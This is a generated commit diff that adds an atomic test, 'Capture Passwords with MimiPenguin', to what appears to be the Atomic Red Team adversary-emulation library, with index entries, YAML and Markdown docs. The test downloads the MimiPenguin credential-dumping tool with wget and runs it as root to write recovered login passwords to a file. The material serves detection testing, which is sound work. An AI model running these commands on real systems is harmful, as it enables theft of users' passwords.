Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-03-09 16:16:04 +00:00
parent 455cd5837e
commit 82df99e7c8
6 changed files with 156 additions and 0 deletions
@@ -102,6 +102,7 @@ credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption cer
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
@@ -27,6 +27,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b
 credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
@@ -146,6 +146,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
  - Atomic Test #1: Golden SAML [azure-ad]
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
@@ -54,6 +54,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
  - Atomic Test #1: Golden SAML [azure-ad]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -6299,6 +6299,73 @@ credential-access:
        cleanup_command: 'rm -f "#{output_file}"

 '
+    - name: Capture Passwords with MimiPenguin
+      auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
+      description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux
+        systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions
+        of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin
+        will retrieve passwords from memory and output them to a specified file. \nSee
+        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007Test3.txt"
+        MimiPenguin_Location:
+          description: Path of MimiPenguin script
+          type: Path
+          default: "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'MimiPenguin script must exist on disk at specified location
+          (#{MimiPenguin_Location})
+
+'
+        prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+          mkdir /tmp/mimipenguin
+          tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+      - description: 'Strings must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: 'sudo apt-get -y install binutils
+
+'
+      - description: 'Python2 must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install python2       \n"
+      - description: 'Libc-bin must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else
+          exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install libc-bin        \n"
+      executor:
+        command: |
+          sudo #{MimiPenguin_Location} > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file} > /dev/null
+
+'
+        name: bash
+        elevation_required: true
  T1606.002:
    technique:
      external_references:
@@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin

 - [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)

+- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin)
+

 <br/>

@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed"



+<br/>
+<br/>
+
+## Atomic Test #3 - Capture Passwords with MimiPenguin
+MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
+| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo #{MimiPenguin_Location} > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{output_file} > /dev/null
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+##### Check Prereq Commands:
+```sh
+if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+mkdir /tmp/mimipenguin
+tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+```
+##### Description: Strings must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install binutils
+```
+##### Description: Python2 must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install python2
+```
+##### Description: Libc-bin must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install libc-bin
+```
+
+
+
+
 <br/>